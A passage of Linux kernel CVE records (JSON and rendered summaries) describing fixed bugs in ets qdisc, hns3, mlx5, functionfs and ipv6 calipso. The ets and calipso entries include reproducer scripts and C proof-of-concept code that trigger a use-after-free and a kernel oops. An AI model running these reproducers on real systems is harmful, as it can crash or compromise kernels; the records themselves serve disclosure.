sizeof(priomap));\n\n for (i = 0; i \u003c q-\u003enbands; i++)\n WRITE_ONCE(q-\u003eclasses[i].quantum, quanta[i]);\n\n for (i = oldbands; i \u003c q-\u003enbands; i++) {\n q-\u003eclasses[i].qdisc = queues[i];\n if (q-\u003eclasses[i].qdisc != \u0026noop_qdisc)\n qdisc_hash_add(q-\u003eclasses[i].qdisc, true);\n }\n\n // (3) the qdisc is unlocked, now dequeue can be called in parallel\n // to the rest of .change handler\n sch_tree_unlock(sch);\n\n ets_offload_change(sch);\n for (i = q-\u003enbands; i \u003c oldbands; i++) {\n\t // (4) we\u0027re reducing the refcount for our class\u0027s qdisc and\n\t // freeing it\n qdisc_put(q-\u003eclasses[i].qdisc);\n\t // (5) If we call .dequeue between (4) and (5), we will have\n\t // a strong UAF and we can control RIP\n q-\u003eclasses[i].qdisc = NULL;\n WRITE_ONCE(q-\u003eclasses[i].quantum, 0);\n q-\u003eclasses[i].deficit = 0;\n gnet_stats_basic_sync_init(\u0026q-\u003eclasses[i].bstats);\n memset(\u0026q-\u003eclasses[i].qstats, 0, sizeof(q-\u003eclasses[i].qstats));\n }\n return 0;\n}\n\nComment:\nThis happens because some of the classes have their qdiscs assigned to\nNULL, but remain in the active list. This commit fixes this issue by always\nremoving the class from the active list before deleting and freeing its\nassociated qdisc\n\nReproducer Steps\n(trimmed version of what was sent by zdi-disclosures@trendmicro.com)\n\n```\nDEV=\"${DEV:-lo}\"\nROOT_HANDLE=\"${ROOT_HANDLE:-1:}\"\nBAND2_HANDLE=\"${BAND2_HANDLE:-20:}\" # child under 1:2\nPING_BYTES=\"${PING_BYTES:-48}\"\nPING_COUNT=\"${PING_COUNT:-200000}\"\nPING_DST=\"${PING_DST:-127.0.0.1}\"\n\nSLOW_TBF_RATE=\"${SLOW_TBF_RATE:-8bit}\"\nSLOW_TBF_BURST=\"${SLOW_TBF_BURST:-100b}\"\nSLOW_TBF_LAT=\"${SLOW_TBF_LAT:-1s}\"\n\ncleanup() {\n tc qdisc del dev \"$DEV\" root 2\u003e/dev/null\n}\ntrap cleanup EXIT\n\nip link set \"$DEV\" up\n\ntc qdisc del dev \"$DEV\" root 2\u003e/dev/null || true\n\ntc qdisc add dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 2\n\ntc qdisc add dev \"$DEV\" parent 1:2 handle \"$BAND2_HANDLE\" \\\n tbf rate \"$SLOW_TBF_RATE\" burst \"$SLOW_TBF_BURST\" latency \"$SLOW_TBF_LAT\"\n\ntc filter add dev \"$DEV\" parent 1: protocol all prio 1 u32 match u32 0 0 flowid 1:2\ntc -s qdisc ls dev $DEV\n\nping -I \"$DEV\" -f -c \"$PING_COUNT\" -s \"$PING_BYTES\" -W 0.001 \"$PING_DST\" \\\n \u003e/dev/null 2\u003e\u00261 \u0026\ntc qdisc change dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 0\ntc qdisc change dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 2\ntc -s qdisc ls dev $DEV\ntc qdisc del dev \"$DEV\" parent \n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:28.648Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/062d5d544e564473450d72e6af83077c2b2ff7c3"
},
{
"url": "https://git.kernel.org/stable/c/c7f6e7cc14df72b997258216e99d897d2df0dbbd"
},
{
"url": "https://git.kernel.org/stable/c/a75d617a4ef08682f5cfaadc01d5141c87e019c9"
},
{
"url": "https://git.kernel.org/stable/c/9987cda315c08f63a02423fa2f9a1f6602c861a0"
},
{
"url": "https://git.kernel.org/stable/c/06bfb66a7c8b45e3fed01351a4b087410ae5ef39"
},
{
"url": "https://git.kernel.org/stable/c/45466141da3c98a0c5fa88be0bc14b4b6a4bd75c"
},
{
"url": "https://git.kernel.org/stable/c/ce052b9402e461a9aded599f5b47e76bc727f7de"
}
],
"title": "net/sched: ets: Always remove class from active list before deleting in ets_qdisc_change",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71066",
"datePublished": "2026-01-13T15:31:21.931Z",
"dateReserved": "2026-01-13T15:30:19.646Z",
"dateUpdated": "2026-01-19T12:19:28.648Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71064 (GCVE-0-2025-71064)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:31 – Updated: 2026-01-19 12:19
VLAI?
EPSS
Title
net: hns3: using the num_tqps in the vf driver to apply for resources
Summary
In the Linux kernel, the following vulnerability has been resolved:
net: hns3: using the num_tqps in the vf driver to apply for resources
Currently, hdev->htqp is allocated using hdev->num_tqps, and kinfo->tqp
is allocated using kinfo->num_tqps. However, kinfo->num_tqps is set to
min(new_tqps, hdev->num_tqps); Therefore, kinfo->num_tqps may be smaller
than hdev->num_tqps, which causes some hdev->htqp[i] to remain
uninitialized in hclgevf_knic_setup().
Thus, this patch allocates hdev->htqp and kinfo->tqp using hdev->num_tqps,
ensuring that the lengths of hdev->htqp and kinfo->tqp are consistent
and that all elements are properly initialized.
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
e2cb1dec9779ba2d89302a653eb0abaeb8682196 , < c149decd8c18ae6acdd7a6041d74507835cf26e6
(git)
Affected: e2cb1dec9779ba2d89302a653eb0abaeb8682196 , < bcefdb288eedac96fd2f583298927e9c6c481489 (git) Affected: e2cb1dec9779ba2d89302a653eb0abaeb8682196 , < 6cd8a2930df850f4600fe8c57d0662b376520281 (git) Affected: e2cb1dec9779ba2d89302a653eb0abaeb8682196 , < 1956d47a03eb625951e9e070db39fe2590e27510 (git) Affected: e2cb1dec9779ba2d89302a653eb0abaeb8682196 , < 429f946a7af3fbf08761d218746cd4afa80a7954 (git) Affected: e2cb1dec9779ba2d89302a653eb0abaeb8682196 , < 62f28d79a6186a602a9d926a2dbb5b12b6867df7 (git) Affected: e2cb1dec9779ba2d89302a653eb0abaeb8682196 , < c2a16269742e176fccdd0ef9c016a233491a49ad (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "c149decd8c18ae6acdd7a6041d74507835cf26e6",
"status": "affected",
"version": "e2cb1dec9779ba2d89302a653eb0abaeb8682196",
"versionType": "git"
},
{
"lessThan": "bcefdb288eedac96fd2f583298927e9c6c481489",
"status": "affected",
"version": "e2cb1dec9779ba2d89302a653eb0abaeb8682196",
"versionType": "git"
},
{
"lessThan": "6cd8a2930df850f4600fe8c57d0662b376520281",
"status": "affected",
"version": "e2cb1dec9779ba2d89302a653eb0abaeb8682196",
"versionType": "git"
},
{
"lessThan": "1956d47a03eb625951e9e070db39fe2590e27510",
"status": "affected",
"version": "e2cb1dec9779ba2d89302a653eb0abaeb8682196",
"versionType": "git"
},
{
"lessThan": "429f946a7af3fbf08761d218746cd4afa80a7954",
"status": "affected",
"version": "e2cb1dec9779ba2d89302a653eb0abaeb8682196",
"versionType": "git"
},
{
"lessThan": "62f28d79a6186a602a9d926a2dbb5b12b6867df7",
"status": "affected",
"version": "e2cb1dec9779ba2d89302a653eb0abaeb8682196",
"versionType": "git"
},
{
"lessThan": "c2a16269742e176fccdd0ef9c016a233491a49ad",
"status": "affected",
"version": "e2cb1dec9779ba2d89302a653eb0abaeb8682196",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.16"
},
{
"lessThan": "4.16",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "4.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: hns3: using the num_tqps in the vf driver to apply for resources\n\nCurrently, hdev-\u003ehtqp is allocated using hdev-\u003enum_tqps, and kinfo-\u003etqp\nis allocated using kinfo-\u003enum_tqps. However, kinfo-\u003enum_tqps is set to\nmin(new_tqps, hdev-\u003enum_tqps); Therefore, kinfo-\u003enum_tqps may be smaller\nthan hdev-\u003enum_tqps, which causes some hdev-\u003ehtqp[i] to remain\nuninitialized in hclgevf_knic_setup().\n\nThus, this patch allocates hdev-\u003ehtqp and kinfo-\u003etqp using hdev-\u003enum_tqps,\nensuring that the lengths of hdev-\u003ehtqp and kinfo-\u003etqp are consistent\nand that all elements are properly initialized."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:27.482Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/c149decd8c18ae6acdd7a6041d74507835cf26e6"
},
{
"url": "https://git.kernel.org/stable/c/bcefdb288eedac96fd2f583298927e9c6c481489"
},
{
"url": "https://git.kernel.org/stable/c/6cd8a2930df850f4600fe8c57d0662b376520281"
},
{
"url": "https://git.kernel.org/stable/c/1956d47a03eb625951e9e070db39fe2590e27510"
},
{
"url": "https://git.kernel.org/stable/c/429f946a7af3fbf08761d218746cd4afa80a7954"
},
{
"url": "https://git.kernel.org/stable/c/62f28d79a6186a602a9d926a2dbb5b12b6867df7"
},
{
"url": "https://git.kernel.org/stable/c/c2a16269742e176fccdd0ef9c016a233491a49ad"
}
],
"title": "net: hns3: using the num_tqps in the vf driver to apply for resources",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71064",
"datePublished": "2026-01-13T15:31:20.503Z",
"dateReserved": "2026-01-13T15:30:19.646Z",
"dateUpdated": "2026-01-19T12:19:27.482Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68790 (GCVE-0-2025-68790)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-13 15:29
VLAI?
EPSS
Title
net/mlx5: Fix double unregister of HCA_PORTS component
Summary
In the Linux kernel, the following vulnerability has been resolved:
net/mlx5: Fix double unregister of HCA_PORTS component
Clear hca_devcom_comp in device's private data after unregistering it in
LAG teardown. Otherwise a slightly lagging second pass through
mlx5_unload_one() might try to unregister it again and trip over
use-after-free.
On s390 almost all PCI level recovery events trigger two passes through
mxl5_unload_one() - one through the poll_health() method and one through
mlx5_pci_err_detected() as callback from generic PCI error recovery.
While testing PCI error recovery paths with more kernel debug features
enabled, this issue reproducibly led to kernel panics with the following
call chain:
Unable to handle kernel pointer dereference in virtual kernel address space
Failing address: 6b6b6b6b6b6b6000 TEID: 6b6b6b6b6b6b6803 ESOP-2 FSI
Fault in home space mode while using kernel ASCE.
AS:00000000705c4007 R3:0000000000000024
Oops: 0038 ilc:3 [#1]SMP
CPU: 14 UID: 0 PID: 156 Comm: kmcheck Kdump: loaded Not tainted
6.18.0-20251130.rc7.git0.16131a59cab1.300.fc43.s390x+debug #1 PREEMPT
Krnl PSW : 0404e00180000000 0000020fc86aa1dc (__lock_acquire+0x5c/0x15f0)
R:0 T:1 IO:0 EX:0 Key:0 M:1 W:0 P:0 AS:3 CC:2 PM:0 RI:0 EA:3
Krnl GPRS: 0000000000000000 0000020f00000001 6b6b6b6b6b6b6c33 0000000000000000
0000000000000000 0000000000000000 0000000000000001 0000000000000000
0000000000000000 0000020fca28b820 0000000000000000 0000010a1ced8100
0000010a1ced8100 0000020fc9775068 0000018fce14f8b8 0000018fce14f7f8
Krnl Code: 0000020fc86aa1cc: e3b003400004 lg %r11,832
0000020fc86aa1d2: a7840211 brc 8,0000020fc86aa5f4
*0000020fc86aa1d6: c09000df0b25 larl %r9,0000020fca28b820
>0000020fc86aa1dc: d50790002000 clc 0(8,%r9),0(%r2)
0000020fc86aa1e2: a7840209 brc 8,0000020fc86aa5f4
0000020fc86aa1e6: c0e001100401 larl %r14,0000020fca8aa9e8
0000020fc86aa1ec: c01000e25a00 larl %r1,0000020fca2f55ec
0000020fc86aa1f2: a7eb00e8 aghi %r14,232
Call Trace:
__lock_acquire+0x5c/0x15f0
lock_acquire.part.0+0xf8/0x270
lock_acquire+0xb0/0x1b0
down_write+0x5a/0x250
mlx5_detach_device+0x42/0x110 [mlx5_core]
mlx5_unload_one_devl_locked+0x50/0xc0 [mlx5_core]
mlx5_unload_one+0x42/0x60 [mlx5_core]
mlx5_pci_err_detected+0x94/0x150 [mlx5_core]
zpci_event_attempt_error_recovery+0xcc/0x388
Severity ?
No CVSS data available.
Assigner
References
Impacted products
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlx5/core/lag/lag.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "d2495f529d60e8e8c43e6ad524089c38b8be7bc4",
"status": "affected",
"version": "5a977b5833b7a261bfa6094595ffa73c1071588c",
"versionType": "git"
},
{
"lessThan": "6a107cfe9c99a079e578a4c5eb70038101a3599f",
"status": "affected",
"version": "5a977b5833b7a261bfa6094595ffa73c1071588c",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlx5/core/lag/lag.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.18"
},
{
"lessThan": "6.18",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "6.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5: Fix double unregister of HCA_PORTS component\n\nClear hca_devcom_comp in device\u0027s private data after unregistering it in\nLAG teardown. Otherwise a slightly lagging second pass through\nmlx5_unload_one() might try to unregister it again and trip over\nuse-after-free.\n\nOn s390 almost all PCI level recovery events trigger two passes through\nmxl5_unload_one() - one through the poll_health() method and one through\nmlx5_pci_err_detected() as callback from generic PCI error recovery.\nWhile testing PCI error recovery paths with more kernel debug features\nenabled, this issue reproducibly led to kernel panics with the following\ncall chain:\n\n Unable to handle kernel pointer dereference in virtual kernel address space\n Failing address: 6b6b6b6b6b6b6000 TEID: 6b6b6b6b6b6b6803 ESOP-2 FSI\n Fault in home space mode while using kernel ASCE.\n AS:00000000705c4007 R3:0000000000000024\n Oops: 0038 ilc:3 [#1]SMP\n\n CPU: 14 UID: 0 PID: 156 Comm: kmcheck Kdump: loaded Not tainted\n 6.18.0-20251130.rc7.git0.16131a59cab1.300.fc43.s390x+debug #1 PREEMPT\n\n Krnl PSW : 0404e00180000000 0000020fc86aa1dc (__lock_acquire+0x5c/0x15f0)\n R:0 T:1 IO:0 EX:0 Key:0 M:1 W:0 P:0 AS:3 CC:2 PM:0 RI:0 EA:3\n Krnl GPRS: 0000000000000000 0000020f00000001 6b6b6b6b6b6b6c33 0000000000000000\n 0000000000000000 0000000000000000 0000000000000001 0000000000000000\n 0000000000000000 0000020fca28b820 0000000000000000 0000010a1ced8100\n 0000010a1ced8100 0000020fc9775068 0000018fce14f8b8 0000018fce14f7f8\n Krnl Code: 0000020fc86aa1cc: e3b003400004 lg %r11,832\n 0000020fc86aa1d2: a7840211 brc 8,0000020fc86aa5f4\n *0000020fc86aa1d6: c09000df0b25 larl %r9,0000020fca28b820\n \u003e0000020fc86aa1dc: d50790002000 clc 0(8,%r9),0(%r2)\n 0000020fc86aa1e2: a7840209 brc 8,0000020fc86aa5f4\n 0000020fc86aa1e6: c0e001100401 larl %r14,0000020fca8aa9e8\n 0000020fc86aa1ec: c01000e25a00 larl %r1,0000020fca2f55ec\n 0000020fc86aa1f2: a7eb00e8 aghi %r14,232\n\n Call Trace:\n __lock_acquire+0x5c/0x15f0\n lock_acquire.part.0+0xf8/0x270\n lock_acquire+0xb0/0x1b0\n down_write+0x5a/0x250\n mlx5_detach_device+0x42/0x110 [mlx5_core]\n mlx5_unload_one_devl_locked+0x50/0xc0 [mlx5_core]\n mlx5_unload_one+0x42/0x60 [mlx5_core]\n mlx5_pci_err_detected+0x94/0x150 [mlx5_core]\n zpci_event_attempt_error_recovery+0xcc/0x388"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:29:02.907Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/d2495f529d60e8e8c43e6ad524089c38b8be7bc4"
},
{
"url": "https://git.kernel.org/stable/c/6a107cfe9c99a079e578a4c5eb70038101a3599f"
}
],
"title": "net/mlx5: Fix double unregister of HCA_PORTS component",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68790",
"datePublished": "2026-01-13T15:29:02.907Z",
"dateReserved": "2025-12-24T10:30:51.037Z",
"dateUpdated": "2026-01-13T15:29:02.907Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71074 (GCVE-0-2025-71074)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:31 – Updated: 2026-01-23 10:29
VLAI?
EPSS
Title
functionfs: fix the open/removal races
Summary
In the Linux kernel, the following vulnerability has been resolved:
functionfs: fix the open/removal races
ffs_epfile_open() can race with removal, ending up with file->private_data
pointing to freed object.
There is a total count of opened files on functionfs (both ep0 and
dynamic ones) and when it hits zero, dynamic files get removed.
Unfortunately, that removal can happen while another thread is
in ffs_epfile_open(), but has not incremented the count yet.
In that case open will succeed, leaving us with UAF on any subsequent
read() or write().
The root cause is that ffs->opened is misused; atomic_dec_and_test() vs.
atomic_add_return() is not a good idea, when object remains visible all
along.
To untangle that
* serialize openers on ffs->mutex (both for ep0 and for dynamic files)
* have dynamic ones use atomic_inc_not_zero() and fail if we had
zero ->opened; in that case the file we are opening is doomed.
* have the inodes of dynamic files marked on removal (from the
callback of simple_recursive_removal()) - clear ->i_private there.
* have open of dynamic ones verify they hadn't been already removed,
along with checking that state is FFS_ACTIVE.
Severity ?
No CVSS data available.
Assigner
References
Impacted products
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/usb/gadget/function/f_fs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "e5bf5ee266633cb18fff6f98f0b7d59a62819eee",
"status": "affected",
"version": "ddf8abd2599491cbad959c700b90ba72a5dce8d0",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/usb/gadget/function/f_fs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.35"
},
{
"lessThan": "2.6.35",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "2.6.35",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfunctionfs: fix the open/removal races\n\nffs_epfile_open() can race with removal, ending up with file-\u003eprivate_data\npointing to freed object.\n\nThere is a total count of opened files on functionfs (both ep0 and\ndynamic ones) and when it hits zero, dynamic files get removed.\nUnfortunately, that removal can happen while another thread is\nin ffs_epfile_open(), but has not incremented the count yet.\nIn that case open will succeed, leaving us with UAF on any subsequent\nread() or write().\n\nThe root cause is that ffs-\u003eopened is misused; atomic_dec_and_test() vs.\natomic_add_return() is not a good idea, when object remains visible all\nalong.\n\nTo untangle that\n\t* serialize openers on ffs-\u003emutex (both for ep0 and for dynamic files)\n\t* have dynamic ones use atomic_inc_not_zero() and fail if we had\nzero -\u003eopened; in that case the file we are opening is doomed.\n\t* have the inodes of dynamic files marked on removal (from the\ncallback of simple_recursive_removal()) - clear -\u003ei_private there.\n\t* have open of dynamic ones verify they hadn\u0027t been already removed,\nalong with checking that state is FFS_ACTIVE."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-23T10:29:39.189Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/e5bf5ee266633cb18fff6f98f0b7d59a62819eee"
}
],
"title": "functionfs: fix the open/removal races",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71074",
"datePublished": "2026-01-13T15:31:27.413Z",
"dateReserved": "2026-01-13T15:30:19.647Z",
"dateUpdated": "2026-01-23T10:29:39.189Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71085 (GCVE-0-2025-71085)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-01-19 12:19
VLAI?
EPSS
Title
ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()
Summary
In the Linux kernel, the following vulnerability has been resolved:
ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()
There exists a kernel oops caused by a BUG_ON(nhead < 0) at
net/core/skbuff.c:2232 in pskb_expand_head().
This bug is triggered as part of the calipso_skbuff_setattr()
routine when skb_cow() is passed headroom > INT_MAX
(i.e. (int)(skb_headroom(skb) + len_delta) < 0).
The root cause of the bug is due to an implicit integer cast in
__skb_cow(). The check (headroom > skb_headroom(skb)) is meant to ensure
that delta = headroom - skb_headroom(skb) is never negative, otherwise
we will trigger a BUG_ON in pskb_expand_head(). However, if
headroom > INT_MAX and delta <= -NET_SKB_PAD, the check passes, delta
becomes negative, and pskb_expand_head() is passed a negative value for
nhead.
Fix the trigger condition in calipso_skbuff_setattr(). Avoid passing
"negative" headroom sizes to skb_cow() within calipso_skbuff_setattr()
by only using skb_cow() to grow headroom.
PoC:
Using `netlabelctl` tool:
netlabelctl map del default
netlabelctl calipso add pass doi:7
netlabelctl map add default address:0::1/128 protocol:calipso,7
Then run the following PoC:
int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);
// setup msghdr
int cmsg_size = 2;
int cmsg_len = 0x60;
struct msghdr msg;
struct sockaddr_in6 dest_addr;
struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,
sizeof(struct cmsghdr) + cmsg_len);
msg.msg_name = &dest_addr;
msg.msg_namelen = sizeof(dest_addr);
msg.msg_iov = NULL;
msg.msg_iovlen = 0;
msg.msg_control = cmsg;
msg.msg_controllen = cmsg_len;
msg.msg_flags = 0;
// setup sockaddr
dest_addr.sin6_family = AF_INET6;
dest_addr.sin6_port = htons(31337);
dest_addr.sin6_flowinfo = htonl(31337);
dest_addr.sin6_addr = in6addr_loopback;
dest_addr.sin6_scope_id = 31337;
// setup cmsghdr
cmsg->cmsg_len = cmsg_len;
cmsg->cmsg_level = IPPROTO_IPV6;
cmsg->cmsg_type = IPV6_HOPOPTS;
char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);
hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80
sendmsg(fd, &msg, 0);
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3 , < 86f365897068d09418488165a68b23cb5baa37f2
(git)
Affected: 2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3 , < 6b7522424529556c9cbc15e15e7bd4eeae310910 (git) Affected: 2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3 , < 2bb759062efa188ea5d07242a43e5aa5464bbae1 (git) Affected: 2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3 , < c53aa6a5086f03f19564096ee084a202a8c738c0 (git) Affected: 2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3 , < bf3709738d8a8cc6fa275773170c5c29511a0b24 (git) Affected: 2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3 , < 73744ad5696dce0e0f43872aba8de6a83d6ad570 (git) Affected: 2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3 , < 58fc7342b529803d3c221101102fe913df7adb83 (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/ipv6/calipso.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "86f365897068d09418488165a68b23cb5baa37f2",
"status": "affected",
"version": "2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3",
"versionType": "git"
},
{
"lessThan": "6b7522424529556c9cbc15e15e7bd4eeae310910",
"status": "affected",
"version": "2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3",
"versionType": "git"
},
{
"lessThan": "2bb759062efa188ea5d07242a43e5aa5464bbae1",
"status": "affected",
"version": "2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3",
"versionType": "git"
},
{
"lessThan": "c53aa6a5086f03f19564096ee084a202a8c738c0",
"status": "affected",
"version": "2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3",
"versionType": "git"
},
{
"lessThan": "bf3709738d8a8cc6fa275773170c5c29511a0b24",
